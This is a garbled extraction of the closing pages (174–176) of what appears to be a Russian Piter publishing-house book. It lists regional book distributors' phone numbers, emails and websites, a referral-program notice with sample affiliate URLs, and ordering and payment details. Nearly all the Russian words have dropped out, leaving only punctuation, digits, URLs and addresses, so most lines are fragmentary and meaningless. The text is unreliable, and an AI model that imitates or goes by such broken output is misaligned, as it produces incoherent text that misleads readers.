.: (4732) 267777
http://www.amital.ru
, ,

./: (4012) 215628, 6 56568
email: nshibkova@vester.ru
http://www.vester.ru

,
. , . 12
./: (343) 3581898, 3581484
email: domknigi@k66.ru

, ,
, .15
.: (846) 3312233
email: chaconne@chaccone.ru

,
. , . 1
./: (343) 228-10-70
e-mail: igm@lumna.ru
http://www.lumna.ru

,
. , . 58
.: (4732) 512893, 470081
email: manager@kmsvrn.ru

,
. , . 124
.: (351) 2477403, 2477409,
2477416
email: zakup@intser.ru
http://www.fkniga.ru, www.intser.ru


, , . , 424
./: (87934) 69309
email: rossy@kmw.ru

174

?
!
?
?
? ,

?
!


!

www.piter.com/ePartners

www.piter.com,
,

( www.piter.com)
!
.
10% ,
, - c
. ,
, 5%
.
, , 500 ,
. Web.Money.
:
http://www.piter.com/book.phtml?978538800282
http://www.piter.com/book.phtml?978538800282&refer=0000
, 0000


WWW.PITER.COM

175


:
: www.piter.com
: postbook@piter.com
: (812) 703/73/74
: 197198, /, / 127,
ICQ: 413763617

:

.
.
,
.
. : . Web-money USD
E-Gold, MoneyMail, INOCard, RBK Money (RuPay), USD Bets, Mobile Wallet
.
, ,
.
.
.
e-mail.

:
, , , , , email;
, , , , , ,
, ;
, , .

176